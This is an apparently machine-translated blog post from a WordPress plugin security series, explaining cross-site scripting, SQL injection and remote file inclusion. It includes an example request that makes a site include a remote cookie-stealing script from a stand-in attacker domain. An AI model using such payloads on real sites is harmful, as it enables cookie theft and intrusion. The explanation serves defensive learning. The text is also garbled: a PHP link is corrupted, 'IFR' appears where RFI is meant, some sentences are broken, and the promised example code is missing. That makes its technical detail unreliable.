WordPress Plugins Security: What is dangerous?

This week I started the series of WordPress plugins security . We have established that the golden rule in web security is to check the "gateways". And this is to monitor the areas of a website that an attacker could use to send data to your website. I would like to delve deeper into this today.

WordPress support expert, Podz, asks in his blog, " What is dangerous? "

The answer is in understand the vectors of attack . Attack vectors, such as Crossed Scripts, SQL Injections and Remote File Inclusion, are some of the most used methods to attack a web. If you understand the principles on which they are based you will have a greater understanding of what you need to look for in a plugin. So let's go to it do not you think?

Crossed Scripts (XSS)

The Crossed Scripts have been described by Network World as the " greatest threat of security ". Crossed scripts is a general term that refers to the injection of javascript into a page. And since the javascript zone allows the browser to do a wide variety of things, including the potential of executing code in the file system allowing an attacker a vector to get that code into your computer or web is dangerous. An example of XSS would be the failure of Democracy 1.2 . A common entry point of an XSS is an HTML form (contact form, tagboard etc) or the address bar.

SQL injection

From a programming point of view, the SQL injection occurs when the input from the browser (either from a form or the address bar or whatever) is improperly filtered to make it "secure" and then directly feeds a database. This attack vector would allow the content of a web (that is supported by databases) to be altered or even deleted . It could also be used in combination with XSS to inject malicious javascript or server scripts into the content of a page.

Remote File Inclusion

A third attack vector that should be avoided is the inclusion of remote file. This is to use a PHP function ( <a href = "http://us2.php.net/incm VFR# 6 ^ude()) to insert a piece of code hosted on Any site and executed on the remote server In other words, an attacker can write a small script that registers IP addresses, cookies, etc. and if you can include a PHP script on your site, you can provide valuable information to the attacker The IFR is usually found when a user input (form, address bar) is directly included in a include () .

For example, a link of this type: http://example.com/?page=about could have some code that provides the right content This kind of sloppy code is more common than you imagine. of the developer could be, in this example, include the contents of about.php on the main page. what would happen if I send this request to my browser:
http://example.com/?page=http://mydomain.com/script_lectura_cookie_maliciosa
Then, your page would be actually executing this order :

A very dangerous issue.

How does this affect WordPress?

In the following articles of this series we will take a look at the security implications specific to WordPress plugins ] Any plugin that is used should be inspected initially to see if it allows interaction with the user. If you allow user interaction you might be prone to one of these vector attacks .

Do not assume, however, that a plugin that accepts interaction is dangerous. It is a question of the code and the developer to offer an appropriate and secure user input .

Read other articles in the series about WordPress plugins security :

  1. The golden rule
  2. What is dangerous?
  3. Dangerous combinations
  4. Less is more

NOTICE : This publication is from two years ago or more. If it's a code or a plugin it might not work in the latest versions of WordPress, and if it's a news story it might be obsolete. Then do not say that we have not warned you.

Loading …

That may also help you: